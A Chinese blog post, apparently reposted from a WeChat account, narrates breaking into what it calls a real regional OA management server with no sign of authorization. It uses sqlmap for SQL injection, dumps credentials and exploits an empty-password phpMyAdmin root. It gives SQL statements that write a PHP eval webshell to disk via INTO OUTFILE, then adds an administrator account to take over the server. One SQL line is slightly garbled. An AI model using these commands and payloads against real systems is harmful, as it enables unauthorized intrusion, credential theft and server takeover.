前序:中午太冷跟我朋友打了一会会小游戏,吃了一个小午饭,朋友要去电影去了,也是无聊打开我的fofa搜到了一个站
看下,家人们:
看样子这个站挺老了,windows服务器
我们想一下怎么拿下他
二话没说直接丢sqlmap
sqlmap -u url --form
好家伙,存在post注入,root权限,有物理路径可以直接getshell
算了,这不是我的目的,跑一下账号密码,
如图:
就这样轻轻松松得到了OA管理员的账号密码
这个明文破解不了,所以导致我登陆不上去,这就nmd很头疼了
我随便找了一个用户的账号,密码为空,尝试登陆一下...
这个站点应该几年之前就淘汰了,思路最重要
我是个小白,大佬可以多多指教
废话不多说,寻找上传点,getshell....
用了我九牛二虎功夫....还是没能getshell
我想不能这样就放弃,我扫描了一下目录,
myadmin root 密码为空 我人傻了 ,白跑了半个点的账号密码...
root权限那就直接执行sql命令写文件呗
尝试了一下爆物理路径的方法
1、单引号爆路径,2、错误参数值爆路径,3、Google爆路径,4、测试文件爆路径,5、phpmyadmin爆路径,6、配置文件找路径,7、nginx文件类型错误解析爆路径
尝试了一系列方法,结果都已失败告终, 默默地抽了一根烟
想起来了,这破网站还存在目录遍历啊....
给了我点自信,自信即是巅峰,我们就去配置文件找路径
在inc文件夹找到了这样一个php文件,家人们看下
可以看到网站的物理路径了...其实在这里已经getshell了,直接上传php木马就可以了
为了文章的完整性我们继续,毕竟像我这种小白难的getshell...
可以得知 D:CGOA 这就是物理路径 我们去myadmin 执行以下sql命令
第一步:
CREATE TABLE `mysql`.`cesafe` (`cesafe1` TEXT NOT NULL );
第二步:
INSERT INTO `mysql`.`cesafe` (`cesafe1` )VALUES ('<?php @eval($_POST[cesafe])?>');
第三步:
SELECT cesafeFROM study INTO OUTFILE 'D:/CGOA/22php';
这样就给一句话木马写进去了,我们链接一下看下....
上传大马whoami 看下
管理员权限,我们看下3389端口是否开放
添加管理员直接提权服务器...结束
本文始发于微信公众号(疯猫网络):实战:渗透测试某地区OA管理系统
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论